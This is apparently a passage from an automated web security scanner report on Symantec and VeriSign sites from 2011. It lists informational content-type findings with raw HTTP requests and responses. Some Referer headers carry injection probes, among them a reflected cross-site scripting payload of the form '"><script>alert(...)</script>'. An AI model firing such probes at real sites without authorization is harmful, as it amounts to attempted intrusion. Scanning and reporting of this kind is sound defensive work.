Connection: close

............ .h.......(....... ..... .....@......................................>...........................................................q...................................9......................
...[SNIP]...

23.41. http://www.symantec.com/s/searchg/suggest previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.symantec.com
Path:	/s/searchg/suggest

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain JSON.

Request

GET /s/searchg/suggest?q=xss&max=10&site=symc_en_US&client=symc_en_US&access=p&format=rich HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622023420-New%7C1336358023420%3B%20event69%3Devent69%7C1336358023421%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 81
Expires: Fri, 09 Sep 2011 21:33:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 21:33:41 GMT
Connection: close
Vary: Accept-Encoding

{ "query":"xss", "results": [ {"name":"xss-vulnerabilities", "type":"suggest"}] }

23.42. http://www.symantec.com/search/searchjs.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.symantec.com
Path:	/search/searchjs.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /search/searchjs.jsp?lg=en&ct=us&sg=business HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://searchg.symantec.com/search?as_sitesearch=www.symantec.com/connect/blogs&q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0&ie=UTF-8&ip=50.23.123.106&access=p&sort=date:D:L:d1&entqr=0&entsp=a&oe=UTF-8&ud=1
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622035736-New%7C1336358035736%3B%20event69%3Devent69%7C1336358035737%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 6094
Cache-Control: public, max-age=3548
Date: Fri, 09 Sep 2011 21:33:39 GMT
Connection: close

var omniture_region = "NAM";
var omniture_country = "us";
var omniture_language = "en";
var more_results = "More results from";
var site_name = "Symantec.com";
var breadcrumb_search_title = "Search
...[SNIP]...

23.43. http://www.verisign.ch/assets/global/js/leftnav.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verisign.ch
Path:	/assets/global/js/leftnav.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

23.44. http://www.verisign.ch/assets/shared/js/jquery.url.packed.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verisign.ch
Path:	/assets/shared/js/jquery.url.packed.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

23.45. http://www.verisign.ch/assets/shared/js/leftnav_new.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verisign.ch
Path:	/assets/shared/js/leftnav_new.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

23.46. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verisign.ch
Path:	/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

23.47. http://www.verisign.ch/stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verisign.ch
Path:	/stellent/fragments/vrsnJSAssets/vrsnNavMenuElements.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

23.48. http://www.verisign.com/authweb/global/assets/header/js/flyouts.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verisign.com
Path:	/authweb/global/assets/header/js/flyouts.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

23.49. http://www.verisign.com/authweb/global/assets/header/js/header.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verisign.com
Path:	/authweb/global/assets/header/js/header.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:18 GMT
Content-Length: 1558
Content-Type: text/html

/*******************************************
** Header functions **
*******************************************/
//----------------------------------------//
//Load Defaults when DOM i
...[SNIP]...

23.50. http://www.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verisign.com
Path:	/authweb/global/assets/header/js/jquery.autocomplete.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

23.51. http://www.verisign.com/authweb/global/assets/shared/images/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verisign.com
Path:	/authweb/global/assets/shared/images/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

Response

23.52. http://www.verisign.com/authweb/global/assets/shared/images/partners-featured-ssl-promo.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verisign.com
Path:	/authweb/global/assets/shared/images/partners-featured-ssl-promo.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /authweb/global/assets/shared/images/partners-featured-ssl-promo.jpg HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:47 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 20:24:14 GMT
Accept-Ranges: bytes
Content-Length: 15431
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:24:47 GMT
Content-Type: image/jpeg

GIF89a..............Os.............l.qqr.......-...........Yg......"?|NP......................$H..............................NQe.N+.....u.q..........3ny..4^..........<{...............Z:&1......?f....
...[SNIP]...

23.53. http://www.verisign.com/authweb/global/assets/shared/images/ps-freetrial-promo.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verisign.com
Path:	/authweb/global/assets/shared/images/ps-freetrial-promo.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /authweb/global/assets/shared/images/ps-freetrial-promo.jpg HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:47 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 20:24:14 GMT
Accept-Ranges: bytes
Content-Length: 14365
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:24:47 GMT
Content-Type: image/jpeg

GIF89a.....................3.....K..{...................................................................................s...............................s...u....Bh..................... !!.....f...QXVw
...[SNIP]...

23.54. http://www.verisign.com/authweb/global/assets/shared/js/globals.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verisign.com
Path:	/authweb/global/assets/shared/js/globals.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:17 GMT
Content-Length: 3608
Content-Type: text/html

/*******************************************
** Utility functions **
*******************************************/

function linkPopUp(url) {
popupWin = window.open
...[SNIP]...

23.55. http://www.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.boxshadow.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:17 GMT
Content-Length: 1538
Content-Type: text/html

/* **
* jquery-boxshadow.js
*
* $(object).boxshadow({
* hOffset : 3,
* vOffset : 3,
* shadowblur : 3,
* color : '#808080'
* })
*
* If you are using this with IE, you should s
...[SNIP]...

23.56. http://www.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.cacheimage.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:25:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:25:17 GMT
Content-Length: 1356
Content-Type: text/html

/*
* cacheImage: a jQuery plugin
*
* cacheImage is a simple jQuery plugin for pre-caching images. The
* plugin can be used to eliminate flashes of unstyled content (FOUC) and
* improve perceived
...[SNIP]...

23.57. http://www.verisign.com/authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.fancybox-1.3.4.pack.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

23.58. http://www.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.hover_intent.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

23.59. http://www.verisign.com/authweb/global/assets/shared/js/jquery.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verisign.com
Path:	/authweb/global/assets/shared/js/jquery.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

Response

23.60. http://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verisign.com
Path:	/authweb/global/assets/shared/js/rotator.custom.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

23.61. http://www.verisign.com/authweb/global/assets/shared/js/rotator.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verisign.com
Path:	/authweb/global/assets/shared/js/rotator.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:59:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:59:43 GMT
Content-Length: 4102
Content-Type: text/html

var activeBannerId = "";
var activeBannerControllerId = "";
var activeTipId = "";
var rotate = true;
var myBannerNumber = 1;
var activeBannerNumber = myBannerNumber;
var bannerItemsLength = $(
...[SNIP]...

23.62. http://www.verisign.com/stellent/groups/public/documents/image/dev041741.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.verisign.com
Path:	/stellent/groups/public/documents/image/dev041741.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /stellent/groups/public/documents/image/dev041741.jpg HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/ssl/buy-ssl-certificates/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF; mbox=PC#1315621455064-973488.19#1378695614|check#true#1315623674|session#1315623613171-877153#1315625474

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:59:46 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 20:34:54 GMT
Accept-Ranges: bytes
Content-Length: 3231
Expires: Sun, 09 Oct 2011 21:59:46 GMT
Content-Type: image/jpeg

GIF89a..9.....dz.Ki.e|.....7........".r............D....z........Hd....../22....Ti......iii.)Q...............}}}.....A........+...aaa.....JKK...XXX.$..*J.......q.................Rr........).......f{.
...[SNIP]...

23.63. https://www.verisign.com/authweb/global/assets/shared/js/rotator.custom.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.verisign.com
Path:	/authweb/global/assets/shared/js/rotator.custom.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

23.64. https://www.verisign.com/authweb/global/assets/shared/js/rotator.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.verisign.com
Path:	/authweb/global/assets/shared/js/rotator.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Cache-Control: max-age=2592000, public
Expires: Sun, 09 Oct 2011 21:27:48 GMT
Content-Length: 4102
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

var activeBannerId = "";
var activeBannerControllerId = "";
var activeTipId = "";
var rotate = true;
var myBannerNumber = 1;
var activeBannerNumber = myBannerNumber;
var bannerItemsLength = $(
...[SNIP]...

24. Content type is not specified previous
There are 19 instances of this issue:

https://fileconnect.symantec.com/javascript/calendar2.js
https://fileconnect.symantec.com/javascript/s_code.js
https://fileconnect.symantec.com/javascript/validations.js
https://forms.verisign.com/websurveys/servlet/ActionMultiplexer
http://l.player.ooyala.com/verify
https://renewals.symantec.com/renewals/js/InstantInvite3.js
https://renewals.symantec.com/renewals/js/commonFunctions.js
https://renewals.symantec.com/renewals/js/commonValidation2-9-06.js
https://renewals.symantec.com/renewals/js/dhtmlwindow.js
https://renewals.symantec.com/renewals/js/getPageNames.js
https://renewals.symantec.com/renewals/js/modal.js
https://renewals.symantec.com/renewals/js/mySymantecDevKit.js
https://renewals.symantec.com/renewals/js/s_2_code_symc_cust_prod.js
https://renewals.symantec.com/renewals/js/symantec_omniture/mysymc_code_util.js
https://renewals.symantec.com/renewals/js/symantec_omniture/s_code_20100217.js
http://us.norton.com/www-uat.ges.sym
https://www-secure.symantec.com/content/en/us/enterprise/images/liveperson/invite10/close_on.gif/
https://www-secure.symantec.com/content/en/us/enterprise/images/liveperson/invite10/need_help_on.gif/
http://www.symantec.com/business/verisign/fraud-detection-service

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

24.1. https://fileconnect.symantec.com/javascript/calendar2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://fileconnect.symantec.com
Path:	/javascript/calendar2.js

Request

Response

24.2. https://fileconnect.symantec.com/javascript/s_code.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://fileconnect.symantec.com
Path:	/javascript/s_code.js

Request

GET /javascript/s_code.js HTTP/1.1
Host: fileconnect.symantec.com
Connection: keep-alive
Referer: https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_USba9ab%22%3b528b7643cdb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 22:03:54 GMT
Content-length: 15081
Last-Modified: Sat, 21 May 2011 05:26:42 GMT
Accept-Ranges: bytes

/* SiteCatalyst code version: H.14. Copyright 1997-2008 Omniture, Inc. More info available at http://www.omniture.com */
/* Specify the Report Suite ID(s) to track here */

//s_account="devsymantec
...[SNIP]...

24.3. https://fileconnect.symantec.com/javascript/validations.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://fileconnect.symantec.com
Path:	/javascript/validations.js

Request

GET /javascript/validations.js HTTP/1.1
Host: fileconnect.symantec.com
Connection: keep-alive
Referer: https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_USba9ab%22%3b528b7643cdb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/12; s_pers=%20s_nr%3D1315622498618-New%7C1336358498618%3B%20event69%3Devent69%7C1336358498621%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520categories%2525253A%25252520security%2525252C%25252520backup%25252520%25252526%25252520archiving%2525252C%25252520server%25252520management%2525252C%25252520and%25252520storage%25252520software%25252520%2525257C%25252520symantec%25252520enterprise%25252520products%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 22:03:54 GMT
Content-length: 10399
Last-Modified: Sat, 21 May 2011 05:26:42 GMT
Accept-Ranges: bytes

var dtCh= "/";

function trim(strText)
{
// this will get rid of leading spaces
while (strText.substring(0,1) == ' ')
strText = strText.substring(1, strText.length);

// th
...[SNIP]...

24.4. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://forms.verisign.com
Path:	/websurveys/servlet/ActionMultiplexer

Request

GET /websurveys/servlet/ActionMultiplexer HTTP/1.1
Host: forms.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 36
Date: Fri, 09 Sep 2011 21:41:07 GMT

Missing or unknown action ID: null

24.5. http://l.player.ooyala.com/verify previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://l.player.ooyala.com
Path:	/verify

Request

POST /verify?ts=1315621578937 HTTP/1.1
Host: l.player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf
Content-Length: 1
Origin: http://www.verisign.ch
x-verify: AwABAgwAFQsAAgAAAAJDQQsAAwAAAApTQU5UQUNMQVJBCwAEAAAAB1NBTkpPU0UIAAYABbJoCAAH/+1mhgsACAAAAA01MC4yMy4xMjMuMTA2BgAJAycGAAoc6AMACwELAAwAAAALK3pOMGFhRzZhV3YACAAITmrKyQYACQEsCwAEAAAAD0JzOFQ3a3ZMUnR0a3lBSQsABQAAAAJVUwsABgAAADVodHRwOi8vd3d3LnZlcmlzaWduLmNoL3RydXN0LXNlYWwvaW5kZXguaHRtbD90aWQ9Z25wcwgAB05qguIPAAoLAAAAAwAAABx3MWMyVTZmcVZucWFmck1oaUFMYXdZaTlVVWNrAAAAIHcwTm1KaE1UcUFWQmlrMi1tdk1BbHc3bEJPTExyTnBHAAAAAW8PABQMAAAAAwMAAQUAAwABAgMAAgAAAwABAQAPAAwIAAAAAwAAADwAAAA8AAAAAAsADQAAABl2LVdJTl8xMC4zLjE4My43IXItZiFjLTU1DwALDAAAAA4DAAEAAwACEwgABgAAAAAAAwABAgMAAhMIAAZOaWLPAAMAAQEDAAIBCAAGAAAAAAIAEQECABIBAAMAAQADAAIBCAAGAAAAAAIAEQECABIBAAMAAQIDAAIBCAAGTmlizwIAEQECABIBAA8ACwMAAAADAQACAwACGQwAGgsAAQAAAB5pcC0xMC0xMjYtMjE1LTg0XzEzMTU2MDM1NDhfODcLAAIAAAAgdzBObUpoTVRxQVZCaWsyLW12TUFsdzdsQk9MTHJOcEcIAAMAAAAABAAEQAnxqfvnbIsEAAVAdbAAAAAAAAQABkB1sAAAAAAACwAIAAAAAAAADwALAwAAAAMBAAIDAAIKDAAFCAACAAAAAA0ACwMIAAAAAQMABKHpCwAPAAAAEXBsYXllci5vb3lhbGEuY29tAAAPAAsDAAAAAwEAAgMAAgoMAAUIAAIAAAARDQALAwgAAAACBAAEqlMFAAACzAgABQAAAccGAA0ABgYADgEcAAADAAECAwACEgwAEAYAAQABDwACCAAAAAEAAAYXAAIAHAAAAwABAgMAAhIMABAGAAEAAg8AAggAAAABAAAHBQACABwAAA8ACwMAAAADAgABAwACEgwADggABQAAKPAADAAQBgABAB4PAAIIAAAAAQAABwsAAgAcAAAPAAsDAAAAAwEAAgMAAgoMAAUIAAIAAAANDQALAwgAAAACBAAAAR0CAADpcQgABQAAA44GAA0AAwYADgHUAAAPAAsDAAAAAwEAAgMAAgoMAAUIAAIAAAA8DQALAwgAAAABBAAABE8IAAUAAAGABgANAAEGAA4BgAAAAwABAgMAAhIMABAGAAEAAw8AAggAAAABAAAIDwACABwAAAMAEQADABIBAwAPAQA=&sig=0WnlcCNiv6U713lWFHQF
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
